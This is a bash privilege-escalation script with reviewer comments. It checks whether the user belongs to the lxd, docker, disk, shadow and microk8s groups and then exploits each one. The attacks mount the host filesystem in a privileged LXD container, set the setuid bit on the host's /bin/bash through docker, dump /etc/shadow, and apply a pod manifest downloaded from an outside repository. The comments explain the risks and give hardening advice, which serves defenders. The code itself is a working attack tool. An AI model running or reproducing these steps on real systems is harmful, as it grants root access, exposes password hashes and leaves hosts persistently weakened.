#!/bin/bash
##### Group-membership checks: LXD, DOCKER, DISK, SHADOW, MICROK8S
# ANSI colour escape sequences. They are stored unexpanded (a literal
# backslash followed by "e[..m"); `echo -e` interprets them at print time.
RED='\e[31m'
GREEN='\e[32m'
YELLOW='\e[33m'
BLUE='\e[34m'
ENDCOLOR='\e[0m'
# --- lxd group --------------------------------------------------------------
# Risk being demonstrated: a member of the `lxd` group can create a container
# with security.privileged=true and attach the host's / as a disk device, so
# root inside the container can read and write every host file. Membership in
# this group should be treated as root-equivalent.
#
# Reviewer notes:
#   * The check is a substring match on the invoking user's `groups` output,
#     and `=~ 0` is a regex test (any status containing the digit 0 passes).
#     The "NOT VULNERABLE" message only means this user did not match; it says
#     nothing about other accounts on the host.
#   * The image tarball comes from a third-party repository and no checksum is
#     given on this page; it is imported without verification.
#   * The image alias, the container and the / disk device are left in place
#     after the shell exits; nothing in this section removes them.
#
# Hardening / detection: keep `lxd` group membership limited to administrators
# (audit with `getent group lxd`), and alert on `lxc config device add` calls
# whose source is / and on containers created with security.privileged=true.
alpine_tarball=alpine-v3.13-x86_64-20210218_0139.tar.gz

groups | grep lxd &> /dev/null
lxd_status=$?
if [[ $lxd_status =~ 0 ]]; then
  echo -e "${YELLOW}\n[+]Vulnerable to LXD${ENDCOLOR}"
  echo -e "${RED}\nUpload alpine-v3.13-x86_64-20210218_0139.tar.gz file, you can download with this link:${ENDCOLOR}\nhttps://github.com/S12cybersecurity/Groups_PrivEsc/raw/main/alpine-v3.13-x86_64-20210218_0139.tar.gz"

  # Presence test for the tarball in the current working directory.
  ls "$alpine_tarball" &> /dev/null
  tarball_status=$?
  if [[ $tarball_status =~ 0 ]]; then
    echo -e "\n${GREEN}File Founded!!${ENDCOLOR}\n"
    # Output and errors of every lxc step are discarded, so a failed step is
    # not reported before the final exec.
    lxc image import "$alpine_tarball" --alias myimage &> /dev/null
    lxc init myimage mycontainer -c security.privileged=true &> /dev/null
    lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true &> /dev/null
    lxc start mycontainer &> /dev/null
    echo -e "You have host FileSystem in /mnt/root path"
    lxc exec mycontainer /bin/sh
  else
    echo -e "\n${RED}File NOT Found!!${ENDCOLOR}"
    # Ends the whole script here; the sections that follow are not reached.
    exit
  fi
else
  echo -e "\n${RED}[+]LXD NOT VULNERABLE${ENDCOLOR}"
fi
# --- docker group -----------------------------------------------------------
# Risk being demonstrated: a member of the `docker` group can ask the Docker
# daemon to bind-mount the host's / into a container and act on it as
# container root. With a root-running daemon and no user-namespace remapping,
# that is root on the host, so this group is root-equivalent.
#
# Reviewer notes:
#   * The first `docker run` sets the setuid bit on the HOST's /bin/bash
#     (via /mnt/bin/bash). That change persists after the script ends and
#     affects every local user until the mode is restored.
#   * The check is a substring match on the invoking user's `groups` output;
#     "NOT VULNERABLE" only describes this user.
#
# Hardening / detection: restrict `docker` group membership, consider rootless
# mode or userns-remap for the daemon, and monitor for mode changes on
# /bin/bash and for containers started with a bind mount of /.
groups | grep docker &> /dev/null
docker_status=$?
if [[ $docker_status =~ 0 ]]; then
  echo -e "${YELLOW}\n[+]Vulnerable to DOCKER PRIVESC${ENDCOLOR}\n"
  # (not referenced again in this section)
  first_repo=$(docker images --format "{{.Repository}}" | head -n 1)
  docker run -v /:/mnt --rm -it ubuntu chmod u+s /mnt/bin/bash
  bash -p
  echo -e "\n${RED}Entering the docker container in case you couldn't pwn with the previous shell${ENDCOLOR}"
  echo -e "\nYou have host FileSystem in /mnt path\n"
  docker run -v /:/mnt --rm -it ubuntu bash
else
  echo -e "\n${RED}[+]DOCKER NOT VULNERABLE${ENDCOLOR}"
fi
# --- disk group -------------------------------------------------------------
# Risk being reported: on typical Linux systems the `disk` group owns the raw
# block-device nodes, so a member can read (and often write) a filesystem at
# the device level, bypassing file permissions. This section only enumerates
# what is group-owned by `disk`; it does not touch any device.
#
# Reviewer notes: substring match on the invoking user's `groups` output, so
# "NOT VULNERABLE" only describes this user. The find walks the whole tree
# from / and hides its errors.
#
# Hardening: no interactive or service account should be in `disk`; audit
# with `getent group disk`.
groups | grep disk &> /dev/null
disk_status=$?
if [[ $disk_status =~ 0 ]]; then
  echo -e "${YELLOW}\n[+]Vulnerable to DISK PRIVESC${ENDCOLOR}\n"
  echo -e "${YELLOW}Files You Can List${ENDCOLOR}\n"
  find / -group disk 2>/dev/null
else
  echo -e "\n${RED}[+]DISK GROUP NOT VULNERABLE${ENDCOLOR}"
fi
# --- shadow group -----------------------------------------------------------
# Risk being reported: where /etc/shadow is group-readable by `shadow`
# (presumably the Debian-style root:shadow 0640 layout; confirm on the target
# distribution), any member can read every account's password hash and attack
# it offline.
#
# Reviewer notes:
#   * This section prints the full contents of /etc/shadow to stdout. Treat
#     terminal scrollback, logs and any captured output as credential
#     material.
#   * Substring match on the invoking user's `groups` output; "NOT VULNERABLE"
#     only describes this user.
#
# Hardening: keep `shadow` membership to the system tools that need it, and
# rely on a slow password hash plus strong passwords so exposed hashes resist
# offline guessing.
groups | grep shadow &> /dev/null
shadow_status=$?
if [[ $shadow_status =~ 0 ]]; then
  echo -e "${YELLOW}\n[+]Vulnerable to SHADOW PRIVESC${ENDCOLOR}\n"
  echo -e "${YELLOW}/etc/shadow File to try to decrypt hashes${ENDCOLOR}\n"
  echo -e "How to do:\n${BLUE}https://nozerobit.github.io/linux-privesc-wrong-permissions/\n\n${ENDCOLOR}"
  cat /etc/shadow
else
  echo -e "\n${RED}[+]SHADOW GROUP NOT VULNERABLE${ENDCOLOR}"
fi
# --- microk8s group ---------------------------------------------------------
# Risk being demonstrated: members of the `microk8s` group can run
# microk8s.kubectl without sudo, i.e. they can create arbitrary workloads on
# the node. Group membership should be treated as administrative access to
# the cluster and, through pod settings, to the host.
#
# Reviewer notes:
#   * pod.yaml is fetched from a third-party repository and is not shown on
#     this page; review the manifest before it is applied anywhere.
#   * This section edits pod.yaml in place (sed -i) and leaves the `priv-esc`
#     pod running in the cluster afterwards.
#   * Substring match on the invoking user's `groups` output; "NOT VULNERABLE"
#     only describes this user.
#
# Hardening / detection: restrict `microk8s` group membership, enforce Pod
# Security Admission so privileged pods and host mounts are rejected, and
# alert on newly created pods that request them.
groups | grep microk8s &> /dev/null
microk8s_status=$?
if [[ $microk8s_status =~ 0 ]]; then
  echo -e "${YELLOW}\n[+]Vulnerable to MICROKUBS PRIVESC${ENDCOLOR}\n"
  echo -e "${RED}Upload this file to this folder:${ENDCOLOR}\nhttps://raw.githubusercontent.com/S12cybersecurity/Groups_PrivEsc/main/pod.yaml"

  # Presence test for the manifest in the current working directory.
  ls pod.yaml &> /dev/null
  manifest_status=$?
  if [[ $manifest_status =~ 0 ]]; then
    echo -e "\n${GREEN}File Founded!!${ENDCOLOR}\n"
    # First line containing "image" in the deployments' YAML, with spaces
    # removed and the first seven characters cut off.
    image=$(microk8s.kubectl get deployment -o yaml | grep -m 1 "image" | sed 's/ //g' | cut -c 8-)
    # Substitutes that value for the placeholder token in the manifest.
    sed -i "s/peneduro/$image/" pod.yaml
    microk8s.kubectl apply -f pod.yaml
    microk8s.kubectl exec -it priv-esc -- /bin/bash
    echo -e "\nIf you haven't received a shell, add this value, $image , to the image field of the pod.yaml file.Then run the following commands:\n- microk8s.kubectl apply -f pod.yaml\n- microk8s.kubectl exec -it priv-esc -- /bin/bash"
  else
    echo -e "\n${RED}File NOT Found!!${ENDCOLOR}"
  fi
else
  echo -e "\n${RED}[+]MICROKUBS GROUP NOT VULNERABLE${ENDCOLOR}"
fi